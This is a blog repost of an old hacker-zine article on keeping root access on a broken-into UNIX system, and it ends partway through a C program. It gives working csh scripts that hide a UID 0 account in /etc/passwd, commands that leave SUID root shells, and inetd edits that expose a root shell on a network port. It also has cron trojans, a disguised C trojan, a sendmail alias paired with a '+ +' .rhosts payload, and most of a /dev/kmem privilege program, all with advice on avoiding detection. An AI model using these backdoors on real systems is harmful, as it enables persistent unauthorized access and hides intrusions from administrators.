Friday, October 29, 2004

System Backdoor Information

By The Infinity Concept Issue II

Ok..... You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.

The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect

permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally!

After seeming endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user

privilege you have worked so hard to achieve....?


This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike.

From a hacking perspective, it is obvious what good this paper will do you. Admin's can likewise benefit from this paper. Ever

wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your

system?

This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are

ways into one.


Beforehand


Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading

now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field

format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those

robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If

you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a

nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...


The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and

skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the

admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time

to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be

looking for back doors.


The Overt


[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It

flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply

prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...



#!/bin/csh

# Inserts a UID 0 account into the middle of the passwd file.

# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.

# daemon9@netcom.com



set linecount = `wc -l /etc/passwd`

cd # Do this at home.

cp /etc/passwd ./temppass # Safety first.

echo passwd file has $linecount[1] lines.

@ linecount[1] /= 2

@ linecount[1] += 1 # we only want 2 temp files

echo Creating two files, $linecount[1] lines each \(or approximately that\).

split -$linecount[1] ./temppass # passwd string optional

echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa

cat ./xab >> ./xaa

mv ./xaa /etc/passwd

chmod 644 /etc/passwd # or whatever it was beforehand

rm ./xa* ./temppass

echo Done...



NEVER, EVER, change the root password. The reasons are obvious.



[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the

passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second

field).



[3] Leave an SUID root shell in /tmp.



#!/bin/sh

# Everyone's favorite...



cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that...

chmod 4755 /tmp/.evilnaughtyshell



Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted

to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may

notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system

specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.


The Veiled


[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some

background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the

appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical

lines look like this:



(1) (2) (3) (4) (5) (6) (7)

ftp stream tcp nowait root /usr/etc/ftpd ftpd

talk dgram udp wait root /usr/etc/ntalkd ntalkd



Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine

which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.

TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP

or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will

process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a

child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more

inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual

command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.

This is done with an 'internal' flag in fields (6) and (7).

So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it

with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd

file, etc...

For the insinuation-impaired, try this:



Open the /etc/inetd.conf in an available editor. Find the line that reads:





daytime stream tcp nowait root internal



and change it to:



daytime stream tcp nowait /bin/sh sh -i.



You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and

restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea

to do this off peak hours).



[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One

simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in

/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:



(1) (2)/(3) (4)

smtp 25/tcp mail



Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name

associated with the service. For instance, add this line to /etc/services:



evil 22/tcp evil



and this line to /etc/inetd.conf:



evil stream tcp nowait /bin/sh sh -i



Restart inetd as before.



Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,

they offer rentry from *any* account on *any* computer on the Internet.



[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's

crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this

backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have

several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.

It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,

or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab

entry has six fields:



(1) (2) (3) (4) (5) (6)

0 0 * * 1 /usr/bin/updatedb



Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week

(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,

simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the

/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not

be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your

shady intentions). Add this line to /var/spool/crontab/root:



0 0 * * * /usr/bin/trojancode



This is the shell script:



#!/bin/csh

# Is our eviluser still on the system? Let's make sure he is.

#daemon9@netcom.com



set evilflag = (`grep eviluser /etc/passwd`)





if($#evilflag == 0) then # Is he there?



set linecount = `wc -l /etc/passwd`

cd # Do this at home.

cp /etc/passwd ./temppass # Safety first.

@ linecount[1] /= 2

@ linecount[1] += 1 # we only want 2 temp files

split -$linecount[1] ./temppass # passwd string optional

echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa

cat ./xab >> ./xaa

mv ./xaa /etc/passwd

chmod 644 /etc/passwd # or whatever it was beforehand

rm ./xa* ./temppass

echo Done...

else

endif



[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the

/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root

account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a

copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).

Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything

would be ok. Add this line to root's crontab file:





29 2 * * * /bin/usr/sneakysneaky_passwd



make sure this exists:



#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky



and this is the simple shell script:



#!/bin/csh

# Install trojan /etc/passwd file for one minute

#daemon9@netcom.com



cp /etc/passwd /etc/.temppass

cp /var/spool/mail/.sneaky /etc/passwd

sleep 60

mv /etc/.temppass /etc/passwd



[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.

Make sure it runs as root. Name it something innocous. Hide it well.



/* A little trojan to create an SUID root shell, if the proper argument is

given. C code, rather than shell to hide obvious it's effects. */

/* daemon9@netcom.com */



#include



#define KEYWORD "industry3"

#define BUFFERSIZE 10



int main(argc, argv)

int argc;

char *argv[];{



int i=0;



if(argv[1]){ /* we've got an argument, is it the keyword? */



if(!(strcmp(KEYWORD,argv[1]))){



/* This is the trojan part. */

system("cp /bin/csh /bin/.swp121");

system("chown root /bin/.swp121");

system("chmod 4755 /bin/.swp121");

}

}

/* Put your possibly system specific trojan

messages here */

/* Let's look like we're doing something... */

printf("Sychronizing bitmap image records.");

/* system("ls -alR / >& /dev/null > /dev/null&"); */

for(;i<10;i++){

fprintf(stderr,".");

sleep(1);

}

printf("\nDone.\n");

return(0);

} /* End main */



[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several

users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:



"decode: "|/usr/bin/uudecode"



to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.



#! /bin/csh



# Create our .rhosts file. Note this will output to stdout.



echo "+ +" > tmpfile

/usr/bin/uuencode tmpfile /root/.rhosts



Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the

.rhosts file. For a one liner (not faked, however) do this:



%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com



You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your

choosing. Many of the previous scripts and methods can be employed here.







The Covert



[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.

The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this

case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some

general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you

are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)

Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:



get input;

if input is special hardcoded flag, spawn evil trojan;

else if input is valid, continue;

else quit with error;

...



Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.







The Esoteric



[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible

to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write

permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of

your current process, then spawn a csh, which will inherit this UID. The following program does just that.



/* If /kmem is is readable and writable, this program will change the user's

UID and GID to 0. */

/* This code originally appeared in "UNIX security: A practical tutorial"

with some modifications by daemon9@netcom.com */



#include

#include

#include

#include

#include

#include

#include



#define KEYWORD "nomenclature1"



struct user userpage;

long address(), userlocation;



int main(argc, argv, envp)

int argc;

char *argv[], *envp[];{



int count, fd;


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